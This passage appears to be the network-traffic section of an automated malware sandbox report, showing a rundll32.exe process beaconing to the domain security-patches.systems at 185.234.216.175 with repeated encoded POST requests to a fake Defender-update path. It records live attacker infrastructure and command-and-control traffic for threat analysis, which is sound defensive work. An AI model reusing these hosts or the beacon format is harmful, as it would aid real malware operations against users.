Dec 6, 2024 22:15:11.049681902 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.049726963 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.049748898 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.084501028 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.084526062 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.084599018 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.084609032 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.084649086 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.084669113 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.090809107 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.090882063 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.299336910 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.299386024 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.715333939 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.715395927 CET	50133	443	192.168.2.4	185.234.216.175

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:11:03.847310066 CET	64602	53	192.168.2.4	1.1.1.1
Dec 6, 2024 22:11:04.730664968 CET	53	64602	1.1.1.1	192.168.2.4
Dec 6, 2024 22:11:29.204411030 CET	64273	53	192.168.2.4	1.1.1.1
Dec 6, 2024 22:11:29.342467070 CET	53	64273	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 22:11:03.847310066 CET	192.168.2.4	1.1.1.1	0x8d7e	Standard query (0)	security-patches.systems	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:29.204411030 CET	192.168.2.4	1.1.1.1	0x5b76	Standard query (0)	security-patches.systems	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 22:11:04.730664968 CET	1.1.1.1	192.168.2.4	0x8d7e	No error (0)	security-patches.systems		185.234.216.175	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:29.342467070 CET	1.1.1.1	192.168.2.4	0x5b76	No error (0)	security-patches.systems		185.234.216.175	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

security-patches.systems

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:29.474479914 CET	741	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 525 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 33 45 31 4b 32 78 43 52 6e 67 7a 5a 6d 70 42 50 54 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 61 57 67 30 52 58 5a 57 61 6c 4d 78 55 6b 55 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 75 55 6d 31 61 4f 44 67 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 6f 54 32 46 50 65 6d 52 52 50 53 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 [TRUNCATED] Data Ascii: data=eyJBbldGaCI6InN0V3E1K2xCRngzZmpBPT0iLCJGc3RMIjoicThyTjdwTXBCbktpaWg0RXZWalMxUkU9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJuUm1aODgiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJoT2FPemRRPSIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoicisyTndjaz0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
Dec 6, 2024 22:11:30.951967001 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:31.118186951 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:32.565871000 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:32.833405018 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:34.360863924 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:34.631597042 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:36.090418100 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:36.349911928 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:37.828423023 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:38.097306013 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:39.564547062 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:39.845870972 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:41.308697939 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:41.594317913 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:43.073539972 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:43.375782967 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:44.822063923 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:45.086915016 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:46.759536982 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
